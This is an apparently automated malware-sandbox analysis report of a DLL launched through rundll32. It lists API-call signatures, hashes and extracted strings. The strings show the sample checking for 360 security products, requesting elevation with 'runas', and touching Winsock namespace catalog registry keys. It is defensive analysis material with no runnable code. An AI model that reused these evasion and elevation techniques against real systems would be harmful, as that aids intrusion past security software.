                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$Open$QueryValue$PathProcess$AddressAppendCommandCurrentExistsFileFreeHandleLibraryLineProcTokenmemsetwcsstr
                                                                                    • String ID: /elevated$SOFTWARE\360Safe\360Ent$ServiceCall
                                                                                    • API String ID: 3868077243-983453937
                                                                                    • Opcode ID: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
                                                                                    • Instruction ID: 15e9288aeb9452e37e9dffc63771de1b8c488dcb05314bb0ab77bc9e2c882ef0
                                                                                    • Opcode Fuzzy Hash: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
                                                                                    • Instruction Fuzzy Hash: 1C514F72B00B188AFB919F65DC847DC33B5BB48BA8F148125EE2A536A5DF34CA49C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCurrentFolderFromHandleListLocationMallocModulePathProcProcessSpecialwcsstr
                                                                                    • String ID: (x86)$IsWow64Process$Kernel32.dll$\SysWOW64$\System32
                                                                                    • API String ID: 3215350457-2087702655
                                                                                    • Opcode ID: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
                                                                                    • Instruction ID: 20fdff06134b497470b840b0dc70d8e75aaa21696b334e6b55e82bb231538848
                                                                                    • Opcode Fuzzy Hash: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
                                                                                    • Instruction Fuzzy Hash: 58411C7120574882FB96DB65EC543E932A0BB8DBE0F55C226A9A9477A5DF38C74DC300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$String$EnterLeave$AllocByte$CountFreeTickrandsrand
                                                                                    • String ID:
                                                                                    • API String ID: 2388112003-0
                                                                                    • Opcode ID: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
                                                                                    • Instruction ID: ae2396e8f272108b73aaedae01213fa34c0c0a48780782be1cf856f1cb9becad
                                                                                    • Opcode Fuzzy Hash: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
                                                                                    • Instruction Fuzzy Hash: D7C1A133711E4986FB86CF6598843ED23A0F748BE8F498215EE295B794DF34CA49C344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharDesktopFolderMultiWidememset
                                                                                    • String ID: http://$https://
                                                                                    • API String ID: 1422489264-1916535328
                                                                                    • Opcode ID: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
                                                                                    • Instruction ID: c30af850ed793d6246f4afeb4f6cdbd0e11f44053fb96dbf7aad71616760a46c
                                                                                    • Opcode Fuzzy Hash: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
                                                                                    • Instruction Fuzzy Hash: E0D17C72610A8C92FBA2DF25D8807D977A1F759BE4F44C212EA69476E4DF78C788C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 0000000180062148: memset.MSVCRT ref: 000000018006217C
                                                                                      • Part of subcall function 0000000180062148: GetModuleFileNameW.KERNEL32 ref: 0000000180062193
                                                                                      • Part of subcall function 0000000180062148: PathCombineW.SHLWAPI ref: 00000001800621AA
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621DB
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621EF
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062203
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062217
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006222B
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006223F
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062253
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062267
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006227B
                                                                                      • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006228F
                                                                                    • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060B9F
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BD7
                                                                                    • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BF2
                                                                                    • GetModuleFileNameExW.PSAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C0E
                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C1F
                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C2F
                                                                                    • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C4A
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C76
                                                                                    • SysFreeString.OLEAUT32 ref: 0000000180060C89
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModuleOpenProcess$CloseFileName$CombineFreePathStringmemset
                                                                                    • String ID: Kernel32.dll$QueryFullProcessImageNameW
                                                                                    • API String ID: 930578061-1170590071
                                                                                    • Opcode ID: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                                    • Instruction ID: 54324c73b988387a6f6bb080a4d890c873d93734858c8758c4fce1d00ab0755c
                                                                                    • Opcode Fuzzy Hash: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                                    • Instruction Fuzzy Hash: AD418231B01F089AE751CBA2EC04BDD72A2BB4DBD4F548524EE69637A4DF388619C344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errno$?terminate@@C_specific_handlerabortfreeiswctype
                                                                                    • String ID: csm$f
                                                                                    • API String ID: 3008409500-629598281
                                                                                    • Opcode ID: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                                    • Instruction ID: 7b0f8dd17277ba6112c52f93bbbd1643d611d3ff89c652db72cc518acb6e3753
                                                                                    • Opcode Fuzzy Hash: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                                    • Instruction Fuzzy Hash: 1D819172781B0889FBA6DFA490503EC23E0EF4C7D8F048515FA5917BC9DE3A8A599321
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AuthorityCountCurrentExecuteProcessShellWindow$CreateErrorFindForegroundInformationInitializeInstanceLastQueryServiceTickTokenUnknown_memsetsrandwcsstr
                                                                                    • String ID: Progman$Program manager$http://$open$p
                                                                                    • API String ID: 1516062321-2122229248
                                                                                    • Opcode ID: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                                    • Instruction ID: 5854d287d17234f5949c9620cb83c855c738d658d9246579e802d6f7b8ceff8d
                                                                                    • Opcode Fuzzy Hash: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                                    • Instruction Fuzzy Hash: A971A672209F8981FBA19B29D4913DE7360F7C97F4F058326BA6942AD5DF38C648C744
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                                    • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe$safemon\360EDRSensor.exe
                                                                                    • API String ID: 1838183957-848848004
                                                                                    • Opcode ID: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                                    • Instruction ID: 12369466515329e4b94078003e01a8293ee627d21bf6a1b54a8e48e621231722
                                                                                    • Opcode Fuzzy Hash: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                                    • Instruction Fuzzy Hash: F9617132614A4886EBA1DF25E8543DA73A4FB8C7E4F408215BAAD437E5DF39C749CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                                    • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe$safemon\360ExtHost.exe
                                                                                    • API String ID: 1838183957-351904165
                                                                                    • Opcode ID: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                                    • Instruction ID: 01aece9f02afbb37390a2111cb2c5fee408a8cfe5dec439bdff79febd640f7a5
                                                                                    • Opcode Fuzzy Hash: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                                    • Instruction Fuzzy Hash: 27615132614A4892EBA1DB25E8543DA73A4FB8C7E4F448315BAAD436F5DF39C749CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??3@$CriticalDeleteSection
                                                                                    • String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
                                                                                    • API String ID: 1297904149-2676930693
                                                                                    • Opcode ID: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                                    • Instruction ID: 73cc0848a655b1fb88aa06a885314cf1e75da9385d723178a5cf1b8a64167aea
                                                                                    • Opcode Fuzzy Hash: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
                                                                                    • Instruction Fuzzy Hash: F631F232741B4892EF668F25E4443DC63A0F74ABE0F588621EB5C07BA5CF39D5A9C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A907
                                                                                    • FindResourceW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A91F
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A933
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A942
                                                                                    • LockResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A953
                                                                                    • malloc.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A964
                                                                                    • memmove.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A97B
                                                                                    • FreeResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A983
                                                                                    • FreeLibrary.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A98C
                                                                                    • VerQueryValueW.VERSION(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9B4
                                                                                    • free.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                                    • String ID:
                                                                                    • API String ID: 3317409091-0
                                                                                    • Opcode ID: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                                    • Instruction ID: 8185c375a913dccbf35fde3c3455573a2fd048fb7f01b55c3a130ccbeb9ebe14
                                                                                    • Opcode Fuzzy Hash: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
                                                                                    • Instruction Fuzzy Hash: 09316B35606B4886EA86DF16AC0479AB3E4BB4DFC0F0A8426AE4907764EF3CD649C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
                                                                                    • String ID:
                                                                                    • API String ID: 3317409091-0
                                                                                    • Opcode ID: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
                                                                                    • Instruction ID: 7be624b5aba991f8dce8e488531e7c4bc30f0810fde0e2206e2c198a200c07cc
                                                                                    • Opcode Fuzzy Hash: c78e14dcb0124c7fdfddeb6e32502328b3625422cacc1ce2de84f055e235b1f2
                                                                                    • Instruction Fuzzy Hash: F5316D31702B448AEB87DF6AA84479977E0BB4CFD4F098425AE0907764EF38D64AC700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Valuememset$CloseEnumOpen
                                                                                    • String ID: stat
                                                                                    • API String ID: 3313869694-548994849
                                                                                    • Opcode ID: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
                                                                                    • Instruction ID: bca1fd9f3236c41ce4b8b5e5b78ce057e793223580287a74ffbbd9e6a5e702b7
                                                                                    • Opcode Fuzzy Hash: 021697519deb37d11cec93fa9a5ab951d19f885d93b4615a5ee70ee1a279cb79
                                                                                    • Instruction Fuzzy Hash: 4E616076614A8896D7A2CF25E4403DB77A4F7897D4F518216EB9C43BA8DF39C609CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset$CloseCommandExecuteFileHandleLineModuleNameShell
                                                                                    • String ID: /elevated$MPR.dll$runas
                                                                                    • API String ID: 3400839104-479190379
                                                                                    • Opcode ID: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                                    • Instruction ID: c5738ef19aefcfe0893ce15e6bbb4f81d570db0aa822fd902f1c1618a14612e4
                                                                                    • Opcode Fuzzy Hash: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
                                                                                    • Instruction Fuzzy Hash: 35518F32611B4481EB919B29D85039A73A5FB88BF4F108316FABE437E4DF38C649C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromString_wcsupr$HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2249050647-0
                                                                                    • Opcode ID: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
                                                                                    • Instruction ID: c2b84f69b377f8d486519554b3a5ef31eab8a077f1ecb1a3c09cbb62b7b5dce0
                                                                                    • Opcode Fuzzy Hash: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
                                                                                    • Instruction Fuzzy Hash: A5A19E36302A4881EBE79F15D8403E963A1FB58BD4F45C116EA5E5B6E9DF38CB89D300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 3605396869-0
                                                                                    • Opcode ID: bb05992a4f7f9f49a53442d2e1aaa10a6dfd61868bba92c4a54245666e2faaf4
                                                                                    • Instruction ID: a8a4a87ee4486a3df0315efd5b49c1a7fcb6c4673be8a4d0861bdcfc0b0db250
